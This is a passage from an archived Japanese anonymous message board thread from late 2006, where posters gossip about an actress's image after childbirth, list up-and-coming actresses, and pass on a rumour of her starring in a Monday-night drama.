新しい自分を発見しながらブランクを取り戻す積もりのはずだ
結局家庭のなかに男が二人いたようなもので、どんなに既成事実や絆があっても
大方の予想通りになってしまった。お互いにまた繰り返すだろうけど





148 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:50:21 ID:YCVRu9kj
下品な女優になったな。

149 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:08:58 ID:xjnQ4mFW
もともと

150 :名無しさん@お腹いっぱい。:2006/12/29(金) 09:07:50 ID:B9OVlHsj
女優も世代交代。

蒼井 優
長澤まさみ
沢尻エリカ
上野樹里

まだまだいるお


151 :名無しさん@お腹いっぱい。:2006/12/29(金) 14:34:07 ID:KMrEshlC
竹内さんって以前はボーイッシュだったけど産後、色気が出たね
今の方が素敵

152 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:34:00 ID:xAuxPKyT
7月期月9主演だってよ。

153 :名無しさん@お腹いっぱい。:2006/12/29(金) 22:40:40 ID:G+OR40YD
確定なら久々の連ドラだ〜
以前とは違った魅力があるし楽しみだね

154 :名無しさん@お腹いっぱい。:2006/12/30(土) 03:01:53 ID:TRVdikzY
TSUBAKI新春CMの結子さんの美しいこと!

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)